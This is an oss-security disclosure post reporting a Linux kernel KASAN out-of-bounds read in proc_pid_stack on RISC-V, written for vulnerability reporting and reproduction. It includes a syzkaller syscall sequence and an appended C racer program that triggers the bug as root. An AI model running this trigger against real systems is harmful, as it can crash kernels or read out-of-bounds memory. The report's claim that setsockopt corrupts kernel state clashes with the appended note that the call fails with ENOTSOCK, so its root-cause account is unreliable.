Message-ID: <13a4b070.14de8.199d2085ff4.Coremail.xujiakai24@mails.ucas.ac.cn>
Date: Sat, 11 Oct 2025 14:49:48 +0800 (GMT+08:00)
From: 许佳凯 <xujiakai24@...ls.ucas.ac.cn>
To: oss-security@...ts.openwall.com
Subject: Linux kernel: KASAN: out-of-bounds Read in proc_pid_stack on RISC-V
-----Original Message-----
From: 许佳凯 <xujiakai24@...ls.ucas.ac.cn>
Sent: 2025-10-11 14:48:52 (Saturday)
To: security@...nel.org
Cc: paul.walmsley@...ive.com, palmer@...belt.com, aou@...s.berkeley.edu, syzkaller@...glegroups.com, linux-riscv@...ts.infradead.org
Subject: [BUG REPORT] KASAN: out-of-bounds Read in proc_pid_stack on RISC-V

Dear Linux Kernel Security Team and Maintainers,
We would like to report a security vulnerability in the Linux kernel, identified as a KASAN out-of-bounds read, which we discovered through fuzz testing.

1. Affected Version
The bug was successfully reproduced on the upstream Linux kernel version 6.16, specifically at commit 038d61fd642278bab63ee8ef722c50d10ab01e8f.


2. Build Configuration
The kernel was built with the accompanying configuration file (see attachment: .config), which includes the necessary KASAN options to detect this issue.


3. Proof of Concept and Reproduction
We have provided a reliable C reproducer program (repro.cprog attached) to trigger this bug. Additional diagnostic information, including full kernel logs and system context, can be found in the attached files log0, report0, and machineInfo0.
The vulnerability is triggered by the following sequence of system calls:
r0 = syz_open_procfs(0x0, &(0x7f0000000000)='stack\x00');
read(r0, &(0x7f0000000040)=""/5, 0x5); // (async)
setsockopt$MRT_INIT(r0, 0x0, 0xc8, 0x0, 0x0);


4. Root Cause Analysis
The core issue is a race condition that corrupts kernel state. The bug occurs when one thread initiates a kernel stack walk by reading the /proc/self/stack file, while a second thread concurrently issues a setsockopt() system call with the MRT_INIT command on the same file descriptor. This setsockopt operation is invalid for a proc filesystem file descriptor and inadvertently corrupts internal kernel data structures associated with it. This corruption causes the first thread's subsequent stack frame traversal (walk_stackframe) to compute an invalid memory address, resulting in an out-of-bounds read that is caught by KASAN.


Thank you for your attention to this matter.


Download attachment "machineInfo0" of type "application/octet-stream" (1141 bytes)

Download attachment "report0" of type "application/octet-stream" (3319 bytes)

Download attachment "repro.cprog" of type "application/octet-stream" (26831 bytes)

Download attachment "log0" of type "application/octet-stream" (98061 bytes)

Download attachment ".config" of type "application/xml" (224634 bytes)
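The syzkaller program from section 3, rewritten as an added stand-alone C racer. This is not the reporter's attached repro.cprog (the archive only lists that file; its contents are not shown here): the parent process reads the first bytes of /proc/self/stack in a loop while a forked child hammers setsockopt(IPPROTO_IP, MRT_INIT) on the same open file description. Two things a practitioner should have in front of them when running it. First, mainline restricts /proc/<pid>/stack to root, so run it as root on a KASAN-enabled kernel; the evidence of the bug is the KASAN splat in dmesg, not anything the program returns. Second, setsockopt() on a descriptor that is not a socket fails with ENOTSOCK in the generic socket lookup, so the child counts any other result as unexpected; that count is what the functions below return, which lets the harness be checked on an ordinary file. The MRT_INIT value 200 matches the 0xc8 in the syz program; the fork-based racer (the syz program uses a second thread, which shares the same struct file either way), the default iteration count and the helper names are choices made for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

/* MRT_BASE in <linux/mroute.h>; the 0xc8 in the syz program above. Defined
 * here so the example builds without the kernel UAPI header. */
#ifndef MRT_INIT
#define MRT_INIT 200
#endif

/* setsockopt(IPPROTO_IP, MRT_INIT) on fd, as the syz program's
 * setsockopt$MRT_INIT(r0, 0x0, 0xc8, 0x0, 0x0). Returns 0 on success,
 * otherwise errno. On a procfs fd the generic socket lookup fails before any
 * protocol code runs, so ENOTSOCK is the expected result. */
static int try_mrt_init(int fd)
{
    if (setsockopt(fd, IPPROTO_IP, MRT_INIT, NULL, 0) == 0)
        return 0;
    return errno;
}

/* The syz program's read(r0, ..., 0x5): fetch up to 5 bytes from offset 0,
 * which for /proc/self/stack drives walk_stackframe on the reading task.
 * Returns the byte count or -errno. */
static ssize_t read_head(int fd)
{
    char buf[5];
    ssize_t n = pread(fd, buf, sizeof buf, 0);
    return n < 0 ? -errno : n;
}

/* Race `iters` rounds on `path`: the child repeats try_mrt_init() on the
 * shared fd while the parent repeats read_head(). Returns -1 if the file
 * cannot be opened or the child did not exit normally, otherwise the number
 * of setsockopt calls that did not fail with ENOTSOCK (expected 0). */
static int run_race(const char *path, int iters)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0) {
        close(fd);
        return -1;
    }
    if (pid == 0) {
        int unexpected = 0;
        for (int i = 0; i < iters; i++)
            if (try_mrt_init(fd) != ENOTSOCK)
                unexpected++;
        _exit(unexpected > 255 ? 255 : unexpected);
    }

    for (int i = 0; i < iters; i++)
        (void)read_head(fd);

    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) {
        close(fd);
        return -1;
    }
    close(fd);
    return WEXITSTATUS(status);
}

int main(int argc, char **argv)
{
    /* Example defaults: the file from the report and a large round count. */
    const char *path = argc > 1 ? argv[1] : "/proc/self/stack";
    int iters = argc > 2 ? atoi(argv[2]) : 100000;

    int r = run_race(path, iters);
    if (r < 0) {
        perror(path);
        return 1;
    }
    printf("%d setsockopt results other than ENOTSOCK; check dmesg for KASAN\n", r);
    return 0;
}
```

Build with `cc -O1 -o stackrace stackrace.c` and run `./stackrace` as root on the KASAN-enabled kernel built from the attached .config, then inspect dmesg. Passing another path (for example /dev/null) exercises the same syscall sequence against a file that has no seq_file stack walk behind it, which is a useful control when the splat does not reproduce.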
